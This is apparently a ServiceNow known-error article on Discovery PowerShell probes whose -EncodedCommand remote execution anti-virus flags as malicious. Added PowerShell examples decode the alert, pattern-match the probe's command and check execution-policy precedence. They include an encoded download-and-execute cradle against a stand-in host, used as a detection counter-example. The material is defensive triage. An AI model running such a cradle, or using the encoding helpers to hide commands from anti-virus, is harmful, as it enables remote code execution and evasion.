Description

The Remote Execution framework is now used in Madrid for several Windows PowerShell probes. The PowerShell command is run with "-EncodedCommand", which passes the script body as a Base64-encoded (UTF-16LE) string, and that is seen as potentially malicious by anti-virus software, including CrowdStrike. This is in addition to the script being staged on the admin$ share and executed from the Temp folder, both of which can also be considered indicators of potentially malicious code. This is a false positive, but it will prevent that probe from running.

In Madrid, these probes have the new "Execute script remotely" field set to true:

  • Windows - Active Connections
    This is used by the existing "Windows - ADM" multiprobes (change related to PRB1291020)
  • Windows - Azure
    This is triggered by the Windows 2016 Server classifier (change related to PRB1270477)

This causes PSScript.ps1 to use ExecuteRemote.ps1 to execute the script on the target instead of on the MID Server. The temporary filename will be "psscript_executeRemote_<GUID>.ps1", and the file is deleted immediately after the probe runs.

In the case of CrowdStrike, the use of -EncodedCommand is the trigger, and an alert may look something like:

powershell -ExecutionPolicy ByPass -NonInteractive -WindowStyle Hidden -EncodedCommand JgAgAHsAbQBvAGQAZQAgAGMAbwBuACAAbABpAG4AZQBzAD0AMQAgAGMAbwBsAHMAPQA5ADkAOQA5ADsAIAAgACYAIABcAFwAMQAwAC4AMgA0ADEALgAyADIALgA0ADcAXABhAGQAbQBpAG4AJABcAHQAZQBtAHAAXAB1AG4AcgBlAGcAaQBzAHQAZQByAGUAZABcAHAAcwBzAGMAcgBpAHAAdABfAGUAeABlAGMAdQB0AGUAUgBlAG0AbwB0AGUAXwA3AGQANABhAGMANAAyAGIALQAyAGMAZgBjAC0ANAA0ADcAMQAtAGEAOABmADcALQAzADUAOAA4ADYAYQA0ADgANwAwAGQAZgAuAHAAcwAxAH0A
After Base64-decoding the encoded command (the payload is UTF-16LE text):
& {mode con lines=1 cols=9999; & \\10.x.x.x\admin$\temp\unregistered\psscript_executeRemote_7d4ac42b-2cfc-4471-a8f7-35886a4870df.ps1}
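The following is an added example, not code from the ServiceNow article or from the probe scripts it describes. It shows how an -EncodedCommand payload is built (Base64 over the UTF-16LE bytes of the command, which is why the alert text starts with "JgAgAHsA" for "& {"), how to decode one from an alert, and a narrow triage check that only accepts the exact shape this article describes (a psscript_executeRemote_<GUID>.ps1 file under admin$\temp). The function names and the regular expression are this example's own; the sample command is the article's decoded line, including its redacted 10.x.x.x address, re-encoded here rather than copied from the alert.

```powershell
# Added example: encode/decode -EncodedCommand payloads and triage the Discovery pattern.
# Names below (ConvertTo-EncodedCommand, Test-DiscoveryEncodedCommand, $discoveryPattern)
# are this example's own, not part of ServiceNow's probe scripts.

function ConvertTo-EncodedCommand {
    param([Parameter(Mandatory)][string]$Command)
    # powershell.exe -EncodedCommand expects Base64 of the UTF-16LE bytes, not UTF-8.
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Command))
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Encoded))
}

# Accepts only the shape described in the article: "mode con" prefix, then the script
# invoked from <host>\admin$\temp\...\psscript_executeRemote_<GUID>.ps1, nothing else.
$discoveryPattern = '^& \{mode con lines=1 cols=9999;\s*& \\\\[^\\]+\\admin\$\\temp\\[^\s]*psscript_executeRemote_[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\.ps1\}$'

function Test-DiscoveryEncodedCommand {
    param([Parameter(Mandatory)][string]$Encoded)
    $decoded = ConvertFrom-EncodedCommand -Encoded $Encoded
    [pscustomobject]@{
        Decoded          = $decoded
        IsDiscoveryProbe = ($decoded -match $discoveryPattern)
    }
}

# Constructed sample: the decoded command from the article (with its redacted host), re-encoded.
$sample  = '& {mode con lines=1 cols=9999; & \\10.x.x.x\admin$\temp\unregistered\psscript_executeRemote_7d4ac42b-2cfc-4471-a8f7-35886a4870df.ps1}'
$encoded = ConvertTo-EncodedCommand -Command $sample
$encoded.Substring(0, 48)   # the "& {mode con lines=" prefix, same leading Base64 as the alert
Test-DiscoveryEncodedCommand -Encoded $encoded

# Constructed counter-example: a download cradle is also encoded, but must not match.
$cradle = ConvertTo-EncodedCommand -Command 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/x")'
Test-DiscoveryEncodedCommand -Encoded $cradle
```

The decoded text, not the Base64 string, is what an analyst should match on: the GUID in the filename changes on every run, so the encoded payload is different every time, while the decoded command has a fixed structure. Keep the pattern anchored as above; a loose match on "psscript" or "admin$" alone would also accept attacker tooling that imitates the probe.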

When a script is copied to and run on the target server, if the target's execution policy is set by Group Policy at the MachinePolicy or UserPolicy scope, that setting takes precedence over the "-ExecutionPolicy ByPass" argument on the command line, so the script will not execute and the probe will fail.
For probes that have the "Execute script remotely" checkbox checked, scripts are copied to the target under the following conditions:

  1. The MID Server is configured to use WMI protocol
  2. The MID Server is configured to use WinRM protocol and the "Copy script to target" checkbox on the probe is checked
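The following added example, which is not code from the ServiceNow article or its probes, shows how to predict on a target whether a copied script launched with "-ExecutionPolicy ByPass" will actually be allowed to run. PowerShell takes the first scope in the order MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine whose value is not Undefined; the command-line argument only sets the Process scope, which is why a Group Policy value at either of the first two scopes wins. The function names, the verdict labels and the assumption that the probe script is not Authenticode-signed are this example's own.

```powershell
# Added example: resolve the effective execution policy and decide whether a copied,
# unsigned script started with -ExecutionPolicy ByPass will run. Function names and
# verdict labels are this example's own, not ServiceNow's.
$scopePrecedence = 'MachinePolicy', 'UserPolicy', 'Process', 'CurrentUser', 'LocalMachine'

function Get-EffectiveExecutionPolicy {
    param(
        # Objects with Scope and ExecutionPolicy properties, as "Get-ExecutionPolicy -List"
        # returns them; defaults to the live values on this host.
        [object[]]$PolicyList = (Get-ExecutionPolicy -List),
        # What the launcher asked for with -ExecutionPolicy, i.e. the Process scope.
        [string]$RequestedProcessPolicy = 'Bypass'
    )
    $byScope = @{}
    foreach ($p in $PolicyList) { $byScope[[string]$p.Scope] = [string]$p.ExecutionPolicy }
    $byScope['Process'] = $RequestedProcessPolicy
    foreach ($scope in $scopePrecedence) {
        if ($byScope[$scope] -and $byScope[$scope] -ne 'Undefined') {
            return [pscustomobject]@{ Scope = $scope; ExecutionPolicy = $byScope[$scope] }
        }
    }
    # Nothing set at any scope: PowerShell applies its platform default.
    [pscustomobject]@{ Scope = 'Default'; ExecutionPolicy = 'Undefined' }
}

function Test-RemoteScriptWillRun {
    param(
        [object[]]$PolicyList = (Get-ExecutionPolicy -List),
        # Assumption for this example: the copied probe script carries no Authenticode signature.
        [switch]$ScriptIsSigned
    )
    $e = Get-EffectiveExecutionPolicy -PolicyList $PolicyList
    $verdict = switch ($e.ExecutionPolicy) {
        'Bypass'     { 'Allowed' }
        'Restricted' { 'Blocked' }
        'AllSigned'  { if ($ScriptIsSigned) { 'Allowed' } else { 'Blocked' } }
        # RemoteSigned / Unrestricted / platform default depend on which security zone the
        # host assigns to the UNC path the probe runs from; confirm on the target itself.
        default      { 'NeedsManualCheck' }
    }
    [pscustomobject]@{
        EffectiveScope  = $e.Scope
        EffectivePolicy = $e.ExecutionPolicy
        Verdict         = $verdict
        # True when a Group Policy scope, not the command line, decided the outcome.
        OverriddenByGpo = ($e.Scope -in 'MachinePolicy', 'UserPolicy')
    }
}

# Constructed sample: Group Policy enforces AllSigned at machine level, so ByPass loses.
$gpoHost = @(
    [pscustomobject]@{ Scope = 'MachinePolicy'; ExecutionPolicy = 'AllSigned' },
    [pscustomobject]@{ Scope = 'UserPolicy';    ExecutionPolicy = 'Undefined' },
    [pscustomobject]@{ Scope = 'Process';       ExecutionPolicy = 'Undefined' },
    [pscustomobject]@{ Scope = 'CurrentUser';   ExecutionPolicy = 'Undefined' },
    [pscustomobject]@{ Scope = 'LocalMachine';  ExecutionPolicy = 'RemoteSigned' }
)
Test-RemoteScriptWillRun -PolicyList $gpoHost

# Constructed sample: same host without the Group Policy value; the Process scope now decides.
$plainHost = $gpoHost | ForEach-Object {
    if ($_.Scope -eq 'MachinePolicy') { [pscustomobject]@{ Scope = 'MachinePolicy'; ExecutionPolicy = 'Undefined' } } else { $_ }
}
Test-RemoteScriptWillRun -PolicyList $plainHost

# On a real target, run with no arguments to evaluate the live policy list:
# Test-RemoteScriptWillRun
```

For the first sample the effective scope is MachinePolicy and the verdict is Blocked, which is the failure this article describes; for the second the effective scope is Process and ByPass is honoured. Running the function on the target before enabling "Execute script remotely" tells you whether the probe can work there at all, independently of the anti-virus question.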

Steps to Reproduce

  1. On an instance upgraded to Madrid, run Discovery against a Windows Server 2016 target. That should cause both probes to run.
  2. The anti-virus software on the target server may flag the remote execution of the psscript_executeRemote_<GUID>.ps1 script and prevent the probe from running.

Workaround

This problem has been fixed. If you are able to upgrade, review the Fixed In or Intended Fix Version fields to determine whether any versions have a planned or permanent fix.

Whitelisting in the anti-virus software based on the script filename pattern (psscript_executeRemote_<GUID>.ps1; the GUID changes on every run) or on the script contents may be possible.

There is also a simple way to revert the behaviour. Go to the probe and uncheck the "Execute script remotely" checkbox, then replace the script in the probe parameter with the old version of the script, which is attached to this PRB.


Related Problem: PRB1328998

Seen In

SR - IRM - Audit Management - New York 2019 Q3
SR - IRM - GRC Profiles - Madrid 2019 Q2
SR - IRM - Policy and Compliance - Madrid 2019 Q2
SR - IRM - Risk Management - New York 2019 Q3

Intended Fix Version

New York

Fixed In

Madrid Patch 4

Safe Harbor Statement

This "Intended Fix Version" information is meant to outline ServiceNow's general product direction and should not be relied upon in making a purchasing decision. The information provided here is for information purposes only and may not be incorporated into any contract. It is not a commitment, promise, or legal obligation to deliver any material, code, or functionality. The development, release, and timing of any features or functionality described for our products remains at ServiceNow's sole discretion.

Article Information

Last Updated:2019-08-20 01:33:42
Published:2019-07-17
Attachments:
discovery_probe_parameter_59224b72dbd532003398f1351d96196f.xml
discovery_probe_parameter_7dfc5f870a000483000169d19b46c06d.xml